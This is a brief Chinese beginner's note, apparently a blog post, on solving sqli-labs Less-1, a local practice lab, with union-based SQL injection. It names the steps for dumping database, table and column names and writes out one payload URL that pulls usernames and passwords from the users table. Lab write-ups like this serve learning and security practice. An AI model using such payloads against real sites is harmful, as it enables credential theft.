大佬走开,菜鸟的笔记记录
打开是这样:
f12查看时get请求传参,传入id,存在union注入,直接爆库名
爆表名
爆字段名:
最后爆出用户名密码:
http://localhost/sqli-labs-php7-master/Less-1?id=' union select 1,group_concat(username),group_concat(password) from users -- -
成功。
这里如果不记得column_name等这些在哪里怎么办:
直接拿自己的datagrip看着写